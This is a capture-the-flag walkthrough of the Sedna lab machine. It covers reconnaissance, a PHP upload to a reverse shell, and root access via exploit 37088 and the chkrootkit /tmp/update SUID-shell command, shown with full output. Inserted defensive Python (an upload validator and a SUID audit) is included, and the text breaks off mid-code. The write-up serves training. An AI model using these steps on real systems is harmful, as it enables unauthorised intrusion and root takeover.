Sedna Target Machine

Information Gathering

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.144
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 05:57 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00059s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy
37302/tcp open unknown
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)

Open ports: 22, 53, 80, 110, 111, 139, 143, 445, 993, 995, 8080, 37302

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:01 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
| 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
|_ 256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP STLS PIPELINING SASL CAPA RESP-CODES
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37302/tcp status
| 100024 1 46167/tcp6 status
| 100024 1 54981/udp6 status
|_ 100024 1 58453/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_imap-capabilities: more capabilities STARTTLS IDLE post-login LOGINDISABLEDA0001 LOGIN-REFERRALS Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ ENABLE have
|_ssl-date: TLS randomness does not represent time
445/tcp open Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities IDLE more ENABLE post-login AUTH=PLAINA0001 Pre-login IMAP4rev1 listed SASL-IR OK ID LITERAL+ LOGIN-REFERRALS have
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) UIDL TOP AUTH-RESP-CODE PIPELINING USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after: 2026-10-07T19:17:14
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
37302/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:0:0:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 9h19m57s, deviation: 2h18m34s, median: 7h59m56s
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-09-21T14:01:48-04:00
| smb2-time:
| date: 2023-09-21T18:01:48
|_ start_date: N/A

Takeaways: Ubuntu, /robots.txt, SMB, NFS (rpcbind), and Apache Tomcat/Coyote JSP engine 1.1 on 8080

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nmap --script=vuln -p22,53,80,110,111,139,143,445,993,995,8080,37302 192.168.56.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 06:02 EDT
Nmap scan report for 192.168.56.144
Host is up (0.00038s latency).

PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
| /files/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /modules/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /system/: Potentially interesting folder
|_ /themes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
110/tcp open pop3
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
445/tcp open microsoft-ds
993/tcp open imaps
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
995/tcp open pop3s
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
8080/tcp open http-proxy
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
37302/tcp open unknown
MAC Address: 08:00:27:ED:69:55 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false

Port 80: /robots.txt, /files/, /modules/, /system/, /themes/

Port 8080: /examples/, /manager/html/upload, /manager/html, /docs/

Directory Brute-forcing

Run a directory brute-force:

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo gobuster dir -u http://192.168.56.144/ -w /usr/share/seclists/Discovery/Web-Content/big.txt
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.144/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/09/21 07:46:42 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 290]
/blocks (Status: 301) [Size: 316] [--> http://192.168.56.144/blocks/]
/files (Status: 301) [Size: 315] [--> http://192.168.56.144/files/]
/modules (Status: 301) [Size: 317] [--> http://192.168.56.144/modules/]
/robots.txt (Status: 200) [Size: 36]
/server-status (Status: 403) [Size: 294]
/system (Status: 301) [Size: 316] [--> http://192.168.56.144/system/]
/themes (Status: 301) [Size: 316] [--> http://192.168.56.144/themes/]
Progress: 20271 / 20477 (98.99%)
===============================================================
2023/09/21 07:46:46 Finished
===============================================================

Web Exploitation

While browsing the directories, I came across this image.

It is a preview image that contains the CMS name and product; search for whether it has known vulnerabilities.

<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>

Save the code above as an HTML file, open it locally, upload a PHP file, and inspect the request in a proxy.

Start a listener beforehand, then browse to http://192.168.56.144/files/php.php
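As a defender's counterpart to the upload step above, here is an added example (not the CMS's, the plugin's, or the author's code) of the server-side checks the jquery-file-upload PHP endpoint lacked on this box; the function names, the allowlist and the sample magic bytes are my own choices.

```python
"""Server-side checks for an image upload endpoint.

Added example, not the CMS's or the plugin's code. The jquery-file-upload PHP
handler on this box stored whatever name the client sent under /files/, so a
.php upload was executed by Apache. Here the server picks the stored name,
inspects every extension in the chain, and verifies the content's magic bytes.
"""
import os
import re
import secrets

# Extension the server will store -> magic bytes the content must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a PHP handler configuration may treat as PHP: php, php3..php7, phtml, pht, phar.
SCRIPT_EXT = re.compile(r"^ph(p\d?|tml|t|ar)$")

class UploadRejected(ValueError):
    """Raised with a reason whenever the upload must not be stored."""

def check_upload(client_name: str, data: bytes, max_bytes: int = 5 * 1024 * 1024) -> str:
    """Return a server-chosen file name for a valid image, or raise UploadRejected.

    The client name is only a hint: path components are discarded, every
    extension is checked (shell.php.jpg is rejected, not just shell.php),
    dotfiles such as .htaccess are refused, and the content must match the
    claimed type. The returned name is random and carries the allowlisted
    extension only, so nothing the client controls reaches the filesystem.
    """
    if not data or len(data) > max_bytes:
        raise UploadRejected("empty or oversized upload")
    base = os.path.basename(client_name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing extension or dotfile name")
    exts = parts[1:]
    if any(SCRIPT_EXT.match(e) for e in exts):
        raise UploadRejected("script extension in file name")
    ext = "jpg" if exts[-1] == "jpeg" else exts[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match claimed type")
    return f"{secrets.token_hex(16)}.{ext}"

def store_upload(upload_dir: str, client_name: str, data: bytes) -> str:
    """Validate and write the file without an execute bit; never overwrite.

    upload_dir should live outside the document root or have script execution
    disabled in the web server configuration; the file mode alone is not enough.
    """
    name = check_upload(client_name, data)
    path = os.path.join(upload_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path
```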

┌──(kali㉿kali)-[~/Downloads/Sedna]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.144] 40078
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
16:15:08 up 2:18, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:ed:69:55 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.144/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:feed:6955/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
$ sudo -l
sudo: unable to resolve host Sedna
sudo: no tty present and no askpass program specified
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Sedna:/$

Privilege Escalation

Look at the web root:

www-data@Sedna:/$ cd /var/www
cd /var/www
www-data@Sedna:/var/www$ ls
ls
flag.txt html
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
www-data@Sedna:/var/www$ cd html
cd html
www-data@Sedna:/var/www/html$ ls -liah
ls -liah
total 133M
277818 drwxr-xr-x 9 www-data www-data 4.0K Oct 25 2016 .
277817 drwxr-xr-x 3 root root 4.0K Oct 22 2016 ..
282968 -rw-r--r-- 1 root root 225 Jun 10 2016 .htaccess
262151 -rw-r--r-- 1 www-data www-data 65M Oct 24 2016 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
283341 -rw-r--r-- 1 www-data www-data 65M Aug 17 2016 BuilderEngine-CMS-V3.zip
283378 -rw-r--r-- 1 www-data www-data 638K Oct 24 2016 Hack_The_Planet.jpg
283376 -rw-r--r-- 1 www-data www-data 275K Oct 24 2016 Hack_The_Planet2.jpg
283377 -rw-r--r-- 1 www-data www-data 124K Oct 24 2016 Hack_The_Planet3.jpg
283370 -rw-r--r-- 1 www-data www-data 181K Oct 24 2016 Sedna.jpg
283011 drwxr-xr-x 5 www-data www-data 4.0K Jun 10 2016 block_holders
283021 drwxr-xr-x 54 www-data www-data 4.0K Oct 24 2016 blocks
262152 drwxr-xr-x 19 www-data www-data 4.0K Oct 24 2016 builderengine
283003 -rw-r--r-- 1 www-data www-data 1.4M Jun 10 2016 codecept.phar
283004 -rw-r--r-- 1 www-data www-data 392 Jun 10 2016 codeception.yml
282971 drwxr-xr-x 6 www-data www-data 4.0K Sep 21 16:14 files
283005 -rw-r--r-- 1 www-data www-data 2.2K Jun 10 2016 finder.html
283374 -rw-r--r-- 1 www-data www-data 166K Oct 24 2016 hack-planet-1280-amox-zone.jpg
283375 -rw-r--r-- 1 www-data www-data 256K Oct 24 2016 hack-planet-high-definition-mobile.jpg
283372 -rw-r--r-- 1 www-data www-data 176K Oct 24 2016 hacker-manifesto-ethical.jpg
283373 -rw-r--r-- 1 www-data www-data 603K Oct 24 2016 hacking.jpg
283369 -rw-r--r-- 1 www-data www-data 101 Oct 25 2016 index.html
283007 -rw-r--r-- 1 www-data www-data 1.2K Jun 10 2016 license.txt
401193 drwxr-xr-x 9 www-data www-data 4.0K Oct 24 2016 modules
283379 -rw-r--r-- 1 www-data www-data 560K Oct 24 2016 pososibo-ethical-hacking-hack-fond.jpg
283009 -rw-r--r-- 1 www-data www-data 36 Oct 25 2016 robots.txt
402200 drwxr-xr-x 8 www-data www-data 4.0K Oct 24 2016 system
402431 drwxr-xr-x 6 www-data www-data 4.0K Oct 24 2016 themes
283010 -rw-r--r-- 1 www-data www-data 0 Jun 10 2016 weather.png
www-data@Sedna:/var/www/html$ cat .htaccess
cat .htaccess
<IfModule mod_rewrite.c>

RewriteEngine On

SetEnv HTTP_MOD_REWRITE On

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]

</IfModule>

Check the home directories and cron jobs:

www-data@Sedna:/var/www/html$ ls -liah /home
ls -liah /home
total 8.0K
262147 drwxr-xr-x 2 root root 4.0K Oct 28 2016 .
2 drwxr-xr-x 21 root root 4.0K Oct 7 2016 ..
www-data@Sedna:/var/www/html$ ls -ilah /etc/passwd /etc/shadow /etc/crontab
ls -ilah /etc/passwd /etc/shadow /etc/crontab
131332 -rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
156213 -rw-r--r-- 1 root root 2.0K Nov 4 2016 /etc/passwd
156215 -rw-r----- 1 root shadow 1.3K Nov 4 2016 /etc/shadow
www-data@Sedna:/var/www/html$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

Check SUID binaries:

www-data@Sedna:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
131133 88 -rwsr-xr-x 1 root root 88752 Jun 3 2014 /bin/mount
131146 40 -rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
131174 68 -rwsr-xr-x 1 root root 67704 Jun 3 2014 /bin/umount
147037 32 -rwsr-xr-x 1 root root 30112 Dec 16 2013 /bin/fusermount
131147 44 -rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
21755 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
22577 16 -rwsr-xr-x 1 root lpadmin 13672 Jul 18 2014 /usr/bin/lppasswd
20867 20 -rwsr-xr-x 1 root root 18136 May 7 2014 /usr/bin/traceroute6.iputils
417 32 -rwsr-xr-x 1 root root 30984 Feb 16 2014 /usr/bin/newgrp
20897 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
535 156 -rwsr-xr-x 1 root root 156708 Feb 10 2014 /usr/bin/sudo
348 68 -rwsr-xr-x 1 root root 66252 Feb 16 2014 /usr/bin/gpasswd
277 36 -rwsr-xr-x 1 root root 35916 Feb 16 2014 /usr/bin/chsh
25122 84 -rwsr-sr-x 1 root mail 83872 Oct 21 2013 /usr/bin/procmail
274 44 -rwsr-xr-x 1 root root 44620 Feb 16 2014 /usr/bin/chfn
22441 20 -rwsr-xr-x 1 root root 18168 Feb 11 2014 /usr/bin/pkexec
429 48 -rwsr-xr-x 1 root root 45420 Feb 16 2014 /usr/bin/passwd
20934 484 -rwsr-xr-x 1 root root 492972 May 12 2014 /usr/lib/openssh/ssh-keysign
22446 12 -rwsr-xr-x 1 root root 9804 Feb 11 2014 /usr/lib/policykit-1/polkit-agent-helper-1
624 8 -rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
1588 12 -rwsr-xr-x 1 root root 9612 Apr 12 2014 /usr/lib/pt_chown
25608 12 -rwsr-xr-x 1 root root 9752 Jun 11 2012 /usr/lib/authbind/helper
146763 324 -rwsr-xr-- 1 root messagebus 329856 Jul 3 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
20956 316 -rwsr-xr-- 1 root dip 322968 Jan 22 2013 /usr/sbin/pppd
21187 20 -rwsr-sr-x 1 libuuid libuuid 17996 Jun 3 2014 /usr/sbin/uuidd
22434 36 -rwsr-xr-x 1 root root 34568 Jun 27 2013 /sbin/mount.cifs
29051 88 -rwsr-xr-x 1 root root 88412 Nov 6 2015 /sbin/mount.nfs

Kernel Exploit Privilege Escalation

The kernel version is quite old and gcc is present, so a kernel exploit is worth considering.

I tried the 3.x kernel exploits from the list above; all of them failed, and Dirty COW crashed the system.

The linpeas output was not very helpful either.

After a look at the write-up: there are two privilege-escalation routes here. For the kernel exploit, the search keyword is Ubuntu 14.04.

www-data@Sedna:/tmp$ gcc 37088.c -o 37088
gcc 37088.c -o 37088
www-data@Sedna:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 4761
apport stopped, pid = 4762
getting pid 4761
current pid = 4760..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..2500..
** child: current pid = 4761
** child: executing /bin/su
sleeping 2s..

checker: mode 4534
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
sudo: unable to resolve host Sedna
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt
# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305

chkrootkit Privilege Escalation

Upload pspy and take a look:

www-data@Sedna:/etc$ chkrootkit --version
chkrootkit --version
The program 'chkrootkit' is currently not installed. To run 'chkrootkit' please ask your administrator to install the package 'chkrootkit'
www-data@Sedna:/etc$ cd chkrootkit
cd chkrootkit
www-data@Sedna:/etc/chkrootkit$ ls
ls
ACKNOWLEDGMENTS README.chklastlog chklastlog.c chkutmp.c
COPYRIGHT README.chkwtmp chkproc.c chkwtmp.c
Makefile check_wtmpx.c chkrootkit ifpromisc.c
README chkdirs.c chkrootkit.lsm strings.c
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V
./chkrootkit -V
chkrootkit version 0.49

chkrootkit 0.49 is a vulnerable version: when it runs as root it executes a file named update in /tmp if one exists, so a writable /tmp/update becomes a root command.

www-data@Sedna:/tmp$ echo "cp /bin/bash /tmp/bash;chmod +xs /tmp/bash" > update
www-data@Sedna:/tmp$ cat update
cat update
cp /bin/bash /tmp/bash;chmod +xs /tmp/bash
www-data@Sedna:/tmp$ chmod +x update
chmod +x update
www-data@Sedna:/tmp$ ls
ls
hsperfdata_tomcat7 pspy32 pspy64 tomcat7-tomcat7-tmp update

Wait, wait, and wait some more for chkrootkit to run.

www-data@Sedna:/tmp$ ls -laih
ls -laih
total 6.8M
245 drwxrwxrwt 5 root root 4.0K Sep 23 10:25 .
2 drwxr-xr-x 21 root root 4.0K Oct 7 2016 ..
29063 -rwsr-sr-x 1 root root 964K Sep 23 10:25 bash
28995 drwxr-xr-x 2 tomcat7 tomcat7 4.0K Sep 21 17:36 hsperfdata_tomcat7
29060 -rwxrwxrwx 1 www-data www-data 2.9M Sep 21 09:40 pspy32
29059 -rwxrwxrwx 1 www-data www-data 3.0M Jul 20 03:32 pspy64
951 drwxr-xr-x 2 tomcat7 root 4.0K Sep 21 17:36 tomcat7-tomcat7-tmp
29061 -rwxrwxrwx 1 www-data www-data 43 Sep 21 19:23 update

Successfully obtained a root-owned SUID /tmp/bash.
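To turn the two listings above (the SUID enumeration and the root-owned /tmp/bash it ends in) into a detection rather than an exploit, this added example, not from the original write-up, parses `find -ls` output and flags setuid files that sit in world-writable directories, are copies of shells, or are missing from a baseline; the BASELINE set and the SAMPLE lines are constructed from the listing above.

```python
"""Audit a SUID/SGID listing for privilege-escalation leftovers.

Added example, not part of the original write-up. It consumes the output of
`find / -type f -perm -04000 -ls` as used above and flags what the chkrootkit
abuse leaves behind: a root-owned setuid shell in /tmp.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Known-good setuid/setgid binaries (the stock list from the listing above).
# In real use record this from a freshly provisioned host, not by hand.
BASELINE = {
    "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6", "/bin/fusermount",
    "/usr/bin/at", "/usr/bin/lppasswd", "/usr/bin/traceroute6.iputils",
    "/usr/bin/newgrp", "/usr/bin/mtr", "/usr/bin/sudo", "/usr/bin/gpasswd",
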